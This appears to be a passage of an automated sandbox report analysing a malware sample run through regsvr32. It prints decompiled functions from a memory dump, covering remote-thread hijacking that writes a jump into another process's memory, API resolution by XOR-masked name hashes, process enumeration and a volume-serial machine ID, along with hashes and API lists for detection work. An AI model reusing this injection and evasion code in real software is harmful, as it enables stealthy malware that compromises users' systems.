                                                                                                                                                                        0x049ee034
                                                                                                                                                                        0x049ee03b
                                                                                                                                                                        0x049ee042
                                                                                                                                                                        0x049ee046
                                                                                                                                                                        0x049ee04d
                                                                                                                                                                        0x049ee04e
                                                                                                                                                                        0x049ee050
                                                                                                                                                                        0x049ee055
                                                                                                                                                                        0x049ee05c
                                                                                                                                                                        0x049ee05e
                                                                                                                                                                        0x049ee05e
                                                                                                                                                                        0x049ee06e
                                                                                                                                                                        0x049ee073
                                                                                                                                                                        0x049ee073
                                                                                                                                                                        0x049ee080
                                                                                                                                                                        0x049ee086
                                                                                                                                                                        0x049ee08b
                                                                                                                                                                        0x049ee08d
                                                                                                                                                                        0x049ee096
                                                                                                                                                                        0x049ee096
                                                                                                                                                                        0x049ee09e
                                                                                                                                                                        0x049ee0a3
                                                                                                                                                                        0x049ee0a3
                                                                                                                                                                        0x049ee0a9
                                                                                                                                                                        0x049ee0b4
                                                                                                                                                                        0x049ee0b9
                                                                                                                                                                        0x049ee0c1
                                                                                                                                                                        0x049ee0c7
                                                                                                                                                                        0x049ee0cf
                                                                                                                                                                        0x049ee0e1
                                                                                                                                                                        0x049ee0e7
                                                                                                                                                                        0x049ee0ef
                                                                                                                                                                        0x049ee0f4
                                                                                                                                                                        0x049ee101
                                                                                                                                                                        0x049ee112
                                                                                                                                                                        0x049ee118
                                                                                                                                                                        0x049ee11d
                                                                                                                                                                        0x049ee120
                                                                                                                                                                        0x049ee123
                                                                                                                                                                        0x049ee130
                                                                                                                                                                        0x049ee136
                                                                                                                                                                        0x049ee140
                                                                                                                                                                        0x049ee140
                                                                                                                                                                        0x049ee146
                                                                                                                                                                        0x049ee14e
                                                                                                                                                                        0x049ee159
                                                                                                                                                                        0x049ee15e
                                                                                                                                                                        0x049ee164
                                                                                                                                                                        0x049ee166
                                                                                                                                                                        0x049ee173
                                                                                                                                                                        0x049ee174
                                                                                                                                                                        0x049ee175
                                                                                                                                                                        0x049ee180
                                                                                                                                                                        0x049ee182
                                                                                                                                                                        0x049ee189
                                                                                                                                                                        0x049ee189
                                                                                                                                                                        0x049ee193
                                                                                                                                                                        0x049ee198
                                                                                                                                                                        0x049ee19d
                                                                                                                                                                        0x049ee19d
                                                                                                                                                                        0x049ee1a3
                                                                                                                                                                        0x049ee1aa
                                                                                                                                                                        0x049ee1ab
                                                                                                                                                                        0x049ee1b8
                                                                                                                                                                        0x049ee1cb
                                                                                                                                                                        0x049ee1d0
                                                                                                                                                                        0x049ee1d5
                                                                                                                                                                        0x049ee1de
                                                                                                                                                                        0x049ee1de
                                                                                                                                                                        0x049ee1e4
                                                                                                                                                                        0x049ee1e9
                                                                                                                                                                        0x049ee1ef
                                                                                                                                                                        0x049ee1f5
                                                                                                                                                                        0x049ee1fa
                                                                                                                                                                        0x049ee203
                                                                                                                                                                        0x049ee205
                                                                                                                                                                        0x049ee20c
                                                                                                                                                                        0x049ee20c
                                                                                                                                                                        0x049ee212
                                                                                                                                                                        0x049ee21a
                                                                                                                                                                        0x049ee21f
                                                                                                                                                                        0x049ee220
                                                                                                                                                                        0x049ee225
                                                                                                                                                                        0x049ee22e
                                                                                                                                                                        0x049ee230
                                                                                                                                                                        0x049ee23b
                                                                                                                                                                        0x049ee23b
                                                                                                                                                                        0x049ee244
                                                                                                                                                                        0x049ee24c
                                                                                                                                                                        0x049ee253
                                                                                                                                                                        0x049ee258
                                                                                                                                                                        0x049ee267
                                                                                                                                                                        0x049ee27f
                                                                                                                                                                        0x049ee286
                                                                                                                                                                        0x049ee294
                                                                                                                                                                        0x049ee29f
                                                                                                                                                                        0x049ee2a0
                                                                                                                                                                        0x049ee2a4
                                                                                                                                                                        0x049ee2aa
                                                                                                                                                                        0x049ee2ab
                                                                                                                                                                        0x049ee2b3
                                                                                                                                                                        0x049ee2b8
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ee2c0
                                                                                                                                                                        0x049ee2c4

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 049E8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,049E959D,00000100,?,049E6507), ref: 049E8BEC
                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 049EDF64
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 049EE05E
                                                                                                                                                                        • GetSystemMetrics.USER32(00001000), ref: 049EE06E
                                                                                                                                                                        • GetVersionExA.KERNEL32(00000000), ref: 049EE123
                                                                                                                                                                          • Part of subcall function 049EC8C9: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,049E0000), ref: 049EC96D
                                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 049EE14E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateChangeCloseCurrentDirectoryErrorFindHeapLastMetricsNotificationProcessSystemVersionWindows
                                                                                                                                                                        • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                                                                                                                                                        • API String ID: 3131805607-2706916422
                                                                                                                                                                        • Opcode ID: 94f07fe23e1edd1205d0b4ff0344f36414aeab73dc337f706d70f9c7fbfd701c
                                                                                                                                                                        • Instruction ID: b01aaacf52b1f8791541ee28993f5ce9e922470bdff9220be20367ca074b59f1
                                                                                                                                                                        • Opcode Fuzzy Hash: 94f07fe23e1edd1205d0b4ff0344f36414aeab73dc337f706d70f9c7fbfd701c
                                                                                                                                                                        • Instruction Fuzzy Hash: A2917D71700605AFE705EB75D848FEABBE8FF88304F00417AE51AD7241DB74BA458BA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049ED959 Relevance: 6.1, APIs: 4, Instructions: 89nativethreadCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 143 49ed959-49ed972 call 49ed218 146 49eda4b-49eda56 call 49ed38b 143->146 147 49ed978-49ed986 call 49ed447 143->147 147->146 152 49ed98c-49ed9c3 call 49e8d6d GetThreadContext 147->152 152->146 155 49ed9c9-49eda09 NtProtectVirtualMemory 152->155 156 49eda0b-49eda26 NtWriteVirtualMemory 155->156 157 49eda49 155->157 156->157 158 49eda28-49eda47 NtProtectVirtualMemory 156->158 157->146 158->146 158->157
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E049ED959(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				intOrPtr _v23;
				void _v24;
				long _v28;
				struct _CONTEXT _v744;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t33;
				void* _t57;
				long _t59;
				void* _t62;
				void** _t65;
				void* _t66;

				_t65 = __edx;
				_t57 = __ecx;
				_t66 = 0;
				if(E049ED218(__ecx, __edx, __edx, 0) != 0) {
					_t33 = E049ED447( *((intOrPtr*)(__edx)), _a4); // executed
					_t66 = _t33;
					if(_t66 != 0) {
						E049E8D6D( &_v744, 0, 0x2cc);
						_v744.ContextFlags = 0x10002;
						if(GetThreadContext(_t65[1],  &_v744) != 0) {
							_t62 = _v744.Eax;
							_v12 = _v12 & 0x00000000;
							_v24 = 0xe9;
							_t59 = 5;
							_v23 = _t66 - _t62 - _a4 + _t57 + 0xfffffffb;
							_v8 = _t59;
							_v16 = _t62;
							if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t65, _v744.Eax,  &_v24, _t59,  &_v8) < 0) {
								L6:
								_t66 = 0;
							} else {
								_v28 = _v28 & 0x00000000;
								if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, _v12,  &_v28) < 0) {
									goto L6;
								}
							}
						}
					}
				}
				E049ED38B();
				return _t66;
			}



















                                                                                                                                                                        0x049ed965
                                                                                                                                                                        0x049ed967
                                                                                                                                                                        0x049ed969
                                                                                                                                                                        0x049ed972
                                                                                                                                                                        0x049ed97d
                                                                                                                                                                        0x049ed982
                                                                                                                                                                        0x049ed986
                                                                                                                                                                        0x049ed99a
                                                                                                                                                                        0x049ed9a2
                                                                                                                                                                        0x049ed9c3
                                                                                                                                                                        0x049ed9c9
                                                                                                                                                                        0x049ed9d1
                                                                                                                                                                        0x049ed9df
                                                                                                                                                                        0x049ed9e5
                                                                                                                                                                        0x049ed9e6
                                                                                                                                                                        0x049ed9f2
                                                                                                                                                                        0x049ed9f9
                                                                                                                                                                        0x049eda09
                                                                                                                                                                        0x049eda49
                                                                                                                                                                        0x049eda49
                                                                                                                                                                        0x049eda28
                                                                                                                                                                        0x049eda28
                                                                                                                                                                        0x049eda47
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eda47
                                                                                                                                                                        0x049eda09
                                                                                                                                                                        0x049ed9c3
                                                                                                                                                                        0x049ed986
                                                                                                                                                                        0x049eda4b
                                                                                                                                                                        0x049eda56

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 049ED218: LoadLibraryW.KERNEL32 ref: 049ED312
                                                                                                                                                                          • Part of subcall function 049ED447: NtCreateSection.NTDLL(049ED982,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 049ED4B9
                                                                                                                                                                          • Part of subcall function 049ED447: RegisterClassExA.USER32(?), ref: 049ED50D
                                                                                                                                                                          • Part of subcall function 049ED447: CreateWindowExA.USER32 ref: 049ED538
                                                                                                                                                                          • Part of subcall function 049ED447: DestroyWindow.USER32(00000000), ref: 049ED543
                                                                                                                                                                          • Part of subcall function 049ED447: UnregisterClassA.USER32 ref: 049ED54E
                                                                                                                                                                          • Part of subcall function 049E8D6D: memset.MSVCRT ref: 049E8D7F
                                                                                                                                                                        • GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 049ED9BB
                                                                                                                                                                        • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 049EDA04
                                                                                                                                                                        • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 049EDA21
                                                                                                                                                                        • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 049EDA42
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MemoryVirtual$ClassCreateProtectWindow$ContextDestroyLibraryLoadRegisterSectionThreadUnregisterWritememset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1578692462-0
                                                                                                                                                                        • Opcode ID: d2d2cb7fbc2ea795c99b18b917fb96bbb869fddd4952cb7482a46b7869d1c1e5
                                                                                                                                                                        • Instruction ID: 369332f5e77e277d2840c995aa785bd2b3e8c82ca3bf10fd71951175039da214
                                                                                                                                                                        • Opcode Fuzzy Hash: d2d2cb7fbc2ea795c99b18b917fb96bbb869fddd4952cb7482a46b7869d1c1e5
                                                                                                                                                                        • Instruction Fuzzy Hash: 5E312D72A0010AAFDB12DFA5D984FEEBBBCEF44314F1042B6E504E6254D730EB459B90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049EB96A Relevance: 6.1, APIs: 4, Instructions: 66processCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                        			E049EB96A(void* __ecx, void* __edx) {
				void* _v304;
				void* _v308;
				intOrPtr _v312;
				signed int _t16;
				signed int _t17;
				intOrPtr _t30;
				void* _t33;
				void* _t43;
				void* _t45;

				_t33 = __edx;
				_v304 = __ecx;
				_t16 = CreateToolhelp32Snapshot(2, 0);
				_t45 = _t16;
				_t17 = _t16 | 0xffffffff;
				if(_t45 != _t17) {
					E049E8D6D( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t45,  &_v304) != 0) {
						do {
							_t43 = _v312( &_v308, _t33);
						} while (_t43 != 0 && Process32Next(_t45,  &_v308) != 0);
						FindCloseChangeNotification(_t45);
						_t17 = 0 | _t43 == 0x00000000;
					} else {
						_t30 =  *0x49ff818; // 0x4bef8b0
						 *((intOrPtr*)(_t30 + 0x30))(_t45);
						_t17 = 0xfffffffe;
					}
				}
				return _t17;
			}












                                                                                                                                                                        0x049eb982
                                                                                                                                                                        0x049eb984
                                                                                                                                                                        0x049eb988
                                                                                                                                                                        0x049eb98b
                                                                                                                                                                        0x049eb98d
                                                                                                                                                                        0x049eb992
                                                                                                                                                                        0x049eb9a1
                                                                                                                                                                        0x049eb9a9
                                                                                                                                                                        0x049eb9bd
                                                                                                                                                                        0x049eb9cd
                                                                                                                                                                        0x049eb9d7
                                                                                                                                                                        0x049eb9db
                                                                                                                                                                        0x049eb9f8
                                                                                                                                                                        0x049eb9ff
                                                                                                                                                                        0x049eb9bf
                                                                                                                                                                        0x049eb9bf
                                                                                                                                                                        0x049eb9c5
                                                                                                                                                                        0x049eb9ca
                                                                                                                                                                        0x049eb9ca
                                                                                                                                                                        0x049eb9bd
                                                                                                                                                                        0x049eba08

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 049EB988
                                                                                                                                                                          • Part of subcall function 049E8D6D: memset.MSVCRT ref: 049E8D7F
                                                                                                                                                                        • Process32First.KERNEL32(00000000,?), ref: 049EB9B8
                                                                                                                                                                        • Process32Next.KERNEL32(00000000,?), ref: 049EB9EB
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 049EB9F8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2518216231-0
                                                                                                                                                                        • Opcode ID: c8a4e39b1eec4b294f1b8df05408f0a8e40366749be93e6bf6170ebe56daad3d
                                                                                                                                                                        • Instruction ID: 75d2530d7da857da32074dfd7cbcc2f013506131b63fdce78905c9a213eae528
                                                                                                                                                                        • Opcode Fuzzy Hash: c8a4e39b1eec4b294f1b8df05408f0a8e40366749be93e6bf6170ebe56daad3d
                                                                                                                                                                        • Instruction Fuzzy Hash: CE11C472204301AFC311DE69EC49EAB7BECFF85360F140A3AF665C7180EB24E90587A5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049EEEBB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 191 49eeebb-49eeed2 192 49eef2f 191->192 193 49eeed4-49eeefc 191->193 195 49eef31-49eef35 192->195 193->192 194 49eeefe-49eef21 call 49ea43d call 49ee2c5 193->194 200 49eef36-49eef4d 194->200 201 49eef23-49eef2d 194->201 202 49eef4f-49eef57 200->202 203 49eefa3-49eefa5 200->203 201->192 201->194 202->203 204 49eef59 202->204 203->195 205 49eef5b-49eef61 204->205 206 49eef63-49eef65 205->206 207 49eef71-49eef82 205->207 206->207 210 49eef67-49eef6f 206->210 208 49eef87-49eef93 LoadLibraryA 207->208 209 49eef84-49eef85 207->209 208->192 211 49eef95-49eef9f GetProcAddress 208->211 209->208 210->205 210->207 211->192 212 49eefa1 211->212 212->195
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E049EEEBB(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E049EE2C5( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E049EA43D( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

























                                                                                                                                                                        0x049eeec4
                                                                                                                                                                        0x049eeec6
                                                                                                                                                                        0x049eeec9
                                                                                                                                                                        0x049eeecc
                                                                                                                                                                        0x049eeed2
                                                                                                                                                                        0x049eef2f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eef2f
                                                                                                                                                                        0x049eeed4
                                                                                                                                                                        0x049eeedf
                                                                                                                                                                        0x049eeee2
                                                                                                                                                                        0x049eeee7
                                                                                                                                                                        0x049eeeec
                                                                                                                                                                        0x049eeeef
                                                                                                                                                                        0x049eeef1
                                                                                                                                                                        0x049eeef4
                                                                                                                                                                        0x049eeef7
                                                                                                                                                                        0x049eeefc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eeefe
                                                                                                                                                                        0x049eeefe
                                                                                                                                                                        0x049eef10
                                                                                                                                                                        0x049eef1d
                                                                                                                                                                        0x049eef21
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eef23
                                                                                                                                                                        0x049eef26
                                                                                                                                                                        0x049eef27
                                                                                                                                                                        0x049eef2d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eef2d
                                                                                                                                                                        0x049eef44
                                                                                                                                                                        0x049eef49
                                                                                                                                                                        0x049eef4d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eef59
                                                                                                                                                                        0x049eef59
                                                                                                                                                                        0x049eef5b
                                                                                                                                                                        0x049eef5b
                                                                                                                                                                        0x049eef61
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eef67
                                                                                                                                                                        0x049eef6b
                                                                                                                                                                        0x049eef6f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eef6f
                                                                                                                                                                        0x049eef75
                                                                                                                                                                        0x049eef7d
                                                                                                                                                                        0x049eef82
                                                                                                                                                                        0x049eef85
                                                                                                                                                                        0x049eef85
                                                                                                                                                                        0x049eef87
                                                                                                                                                                        0x049eef8b
                                                                                                                                                                        0x049eef93
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eef97
                                                                                                                                                                        0x049eef9f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eef9f

                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryA.KERNELBASE(.dll,?,00000138,00000000), ref: 049EEF8B
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 049EEF97
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                        • String ID: .dll
                                                                                                                                                                        • API String ID: 2574300362-2738580789
                                                                                                                                                                        • Opcode ID: 001248e3c6f5ab05f0caca8e1021e4fdb3974835de07c808d4eaa4c7414039d6
                                                                                                                                                                        • Instruction ID: 87665d69175a01a9e6da8dd0edbdd611c7d2c913a2bfa54572fe175d4e4316e2
                                                                                                                                                                        • Opcode Fuzzy Hash: 001248e3c6f5ab05f0caca8e1021e4fdb3974835de07c808d4eaa4c7414039d6
                                                                                                                                                                        • Instruction Fuzzy Hash: 4C318F71A001159BCF26CFAAC884ABEBBE9AF49304F284879D845E7351E730E9418B94
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049EC5EC Relevance: 6.1, APIs: 4, Instructions: 83stringCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                        			E049EC5EC(WCHAR* __ecx, WCHAR* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				intOrPtr _t23;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				E049E8D6D(__edx, 0, 0x100);
				_v12 = 0x100;
				_t23 =  *0x49ff818; // 0x4bef8b0
				 *((intOrPtr*)(_t23 + 0xbc))( &_v528,  &_v12);
				lstrcpynW(__edx,  &_v528, 0x100);
				_t27 = E049E9DF2(_t44, 0xad6);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E049E8BAF( &_v16);
				_t33 = E049EA456(_t43);
				E049E9E51( &(_t43[E049EA456(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E049EA456(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E049EE2C5(_t43, E049EA456(_t43) + _t40, 0);
			}
















                                                                                                                                                                        0x049ec5ec
                                                                                                                                                                        0x049ec5f5
                                                                                                                                                                        0x049ec601
                                                                                                                                                                        0x049ec607
                                                                                                                                                                        0x049ec609
                                                                                                                                                                        0x049ec611
                                                                                                                                                                        0x049ec61f
                                                                                                                                                                        0x049ec624
                                                                                                                                                                        0x049ec633
                                                                                                                                                                        0x049ec63e
                                                                                                                                                                        0x049ec64b
                                                                                                                                                                        0x049ec665
                                                                                                                                                                        0x049ec66a
                                                                                                                                                                        0x049ec66c
                                                                                                                                                                        0x049ec673
                                                                                                                                                                        0x049ec683
                                                                                                                                                                        0x049ec694
                                                                                                                                                                        0x049ec69e
                                                                                                                                                                        0x049ec6a6
                                                                                                                                                                        0x049ec6ad
                                                                                                                                                                        0x049ec6b0
                                                                                                                                                                        0x049ec6cd

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 049E8D6D: memset.MSVCRT ref: 049E8D7F
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,00000100), ref: 049EC633
                                                                                                                                                                        • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 049EC665
                                                                                                                                                                          • Part of subcall function 049E9E51: _vsnwprintf.MSVCRT ref: 049E9E6E
                                                                                                                                                                        • lstrcatW.KERNEL32(?,00000114), ref: 049EC69E
                                                                                                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 049EC6B0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 455400327-0
                                                                                                                                                                        • Opcode ID: 1ebb51e4b0f18271f5a3ac48ca3439d7fda0b1663f92a39ddd2a5da2c98490c7
                                                                                                                                                                        • Instruction ID: 404c9e89dba1e03f3632c62f3ba7c97270fc4915f5d882ec76c264d70f418f21
                                                                                                                                                                        • Opcode Fuzzy Hash: 1ebb51e4b0f18271f5a3ac48ca3439d7fda0b1663f92a39ddd2a5da2c98490c7
                                                                                                                                                                        • Instruction Fuzzy Hash: CD2188F2A00218BFE711ABB5DC49FFE77BCDB84214F1441B5F505D6180EA74AE448B64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049EC7F5 Relevance: 4.6, APIs: 3, Instructions: 54COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 213 49ec7f5-49ec815 GetTokenInformation 214 49ec85b 213->214 215 49ec817-49ec820 GetLastError 213->215 216 49ec85d-49ec861 214->216 215->214 217 49ec822-49ec832 call 49e8bde 215->217 220 49ec838-49ec84b GetTokenInformation 217->220 221 49ec834-49ec836 217->221 220->214 222 49ec84d-49ec859 call 49e8bf4 220->222 221->216 222->221
                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                        			E049EC7F5(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E049E8BDE(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E049E8BF4( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}










                                                                                                                                                                        0x049ec7f8
                                                                                                                                                                        0x049ec7f9
                                                                                                                                                                        0x049ec800
                                                                                                                                                                        0x049ec808
                                                                                                                                                                        0x049ec80c
                                                                                                                                                                        0x049ec815
                                                                                                                                                                        0x049ec85b
                                                                                                                                                                        0x049ec85b
                                                                                                                                                                        0x049ec822
                                                                                                                                                                        0x049ec82a
                                                                                                                                                                        0x049ec82c
                                                                                                                                                                        0x049ec832
                                                                                                                                                                        0x049ec84b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ec84d
                                                                                                                                                                        0x049ec852
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ec858
                                                                                                                                                                        0x049ec834
